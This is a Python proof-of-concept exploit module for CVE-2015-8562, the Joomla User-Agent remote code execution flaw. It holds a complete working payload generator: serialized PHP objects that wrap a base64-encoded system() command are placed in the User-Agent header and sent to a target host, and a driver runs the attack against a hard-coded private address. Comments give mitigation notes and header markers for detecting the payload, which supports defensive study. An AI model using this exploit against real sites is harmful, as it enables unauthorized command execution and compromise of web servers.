#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

try:
    from core.log import Log
except Exception as e:
    import sys
    sys.path.append("../../core/log")
    from Log import Log

class Exploit:
    """Proof-of-concept module for CVE-2015-8562 (Joomla User-Agent RCE).

    The module places a serialized PHP object string in the ``User-Agent``
    request header (built by ``generate_payload``) and sends it to the
    configured host with two GET requests (``exploit``).  Background
    write-ups and the vendor advisory are the URLs printed by ``show_info``.

    Notes for defenders reading this file:

    * Mitigation: apply the fix described in the developer.joomla.org
      advisory listed in ``show_info``.  The bugs.php.net entry listed there
      is presumably the underlying PHP-side issue; confirm against that
      report before relying on a PHP upgrade alone.
    * Detection: the header value contains fixed markers that no real
      browser sends, e.g. ``}__test|``, ``JDatabaseDriverMysqli``,
      ``JSimplepieFactory`` and ``disconnectHandlers``.  Matching on these in
      web-server, proxy or WAF logs of request headers identifies this
      payload shape.
    * The URL is built with the ``http://`` scheme, so the header crosses the
      network unencrypted and is visible to network sensors.
    """

    # NOTE(review): this dict lives on the class, so set_config() mutates
    # state shared by every Exploit instance in the process.
    config = {
        "remote_host": {"default": "127.0.0.1", "necessity":True},
        "remote_port": {"default": 80, "necessity":True},
        # Command string that ends up inside the header payload; see exploit().
        "command": {"default": "id", "necessity":True},
    }
    # Not read or written anywhere else in this file.
    webshell_url = ""

    def __init__(self):
        """No per-instance state is set up; all options live in ``config``."""
        pass

    def exploit(self):
        """Send the crafted ``User-Agent`` header to the configured host.

        Returns:
            False if either HTTP request raises (the error is logged),
            True otherwise.  True only means both requests completed: the
            status code and body are logged but never inspected, so it does
            not establish that the target is vulnerable.
        """
        remote_host = self.get_config("remote_host")
        remote_port = int(self.get_config("remote_port"))
        command = self.get_config("command")
        # Plain HTTP only; there is no option for TLS in this module.
        url = "http://%s:%d/" % (remote_host, remote_port)
        # The command is base64-encoded and wrapped in a PHP
        # system(base64_decode(...)) call before being serialized.
        # NOTE(review): str.encode("base64") is a Python 2-only codec, so this
        # module is tied to Python 2 as written.
        payload = self.generate_payload("system(base64_decode('%s'));" % (command.encode("base64").replace("\n", "")))
        headers = {
            'User-Agent': payload
        }
        session = requests.Session()
        try:
            # The same header is sent twice on one requests.Session.  The
            # first response is bound to `cookies` but never read again.
            # Presumably the first request gets the header stored in the
            # server-side session and the second makes the server read it
            # back - confirm against the write-ups listed in show_info().
            # For log review this means two back-to-back GET / requests from
            # one client carrying the identical anomalous User-Agent.
            cookies = session.get(url, headers=headers, timeout=3)
            response = session.get(url, timeout=10, headers=headers)
        except Exception as e:
            # Broad catch: connection errors, timeouts and anything else are
            # all reported the same way.
            Log.Log.error(str(e))
            return False
        content = response.content
        # Logged as "success" regardless of what the server actually returned.
        Log.Log.success(content)
        return True

    def generate_payload(self, php_payload):
        """Wrap ``php_payload`` in the serialized PHP object string.

        The result is a fixed template, followed by ``php_payload`` (with
        ``;JFactory::getConfig();exit`` appended) as a length-prefixed PHP
        serialized string, a fixed tail, and the ``terminate`` byte sequence.

        Args:
            php_payload: PHP source text to embed in the ``feed_url`` field.

        Returns:
            The complete header value as a string.
        """
        # No-op self-assignment kept from the original.
        php_payload = php_payload
        # These four bytes are the UTF-8 encoding of U+1D306 when this runs
        # as a Python 2 byte string.  Presumably the write-ups in show_info()
        # explain why a 4-byte character closes the payload - confirm there.
        terminate = '\xf0\x9d\x8c\x86'
        exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
        injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
        # PHP serialized strings carry an explicit length, so the length of
        # injected_payload is computed here and written in front of it.
        exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
        exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
        return exploit_template

    def show_options(self):
        """Log a table of option name, necessity flag and current value."""
        Log.Log.warning("Options\t\tNecessity\t\tDefault")
        Log.Log.warning("-------\t\t---------\t\t-------")
        for key in sorted(self.config.keys()):
            Log.Log.warning("%s\t\t%s\t\t\t%s" % (key, self.config[key]["necessity"], self.get_config(key)))

    def set_config(self, key, value):
        """Overwrite the stored value of an existing option.

        Unknown keys are logged as an error and otherwise ignored.  ``value``
        is stored as given, without type or range checks.
        """
        if key in self.config.keys():
            # Writes into the class-level dict (see the note on `config`).
            self.config[key]["default"] = value
        else:
            Log.Log.error("No such option!")

    def get_config(self, key):
        """Return the current value of ``key``; raises KeyError if unknown."""
        return self.config[key]["default"]

    def show_info(self):
        """Log the module name, affected versions, credits and references."""
        # NOTE(review): "Effected" is presumably a typo for "Affected", and
        # "3.45" presumably means 3.4.5 - confirm the exact affected range
        # against the developer.joomla.org advisory listed below.
        Log.Log.info("Name: Joomla(1.5 < 3.45) HTTP Header Unauthenticated RCE (CVE-2015-8562)")
        Log.Log.info("Effected Version: 1.5 < 3.45")
        Log.Log.info("Author: Andrew McNicol")
        Log.Log.info("GitHub: https://github.com/anarcoder")
        Log.Log.info("Refer:")
        Log.Log.info('\thttps://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html')
        Log.Log.info('\thttps://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html')
        # Vendor advisory: the authoritative source for the fixed release.
        Log.Log.info('\thttps://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html')
        Log.Log.info('\thttps://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/')
        Log.Log.info('\thttps://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330')
        Log.Log.info('\thttps://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html')
        Log.Log.info('\thttps://bugs.php.net/bug.php?id=70219')

def main():
    """Demo driver: print module info, override the host, list options, run.

    The host is overwritten with the author's hard-coded private (RFC 1918)
    address before the options table is printed, so the table shows that
    value rather than the 127.0.0.1 default.
    """
    poc = Exploit()
    poc.show_info()
    poc.set_config("remote_host", "192.168.187.1")
    poc.show_options()
    poc.exploit()

# Run the demo driver only when executed as a script, not when this module
# is imported by a surrounding framework.
if __name__ == "__main__":
    main()
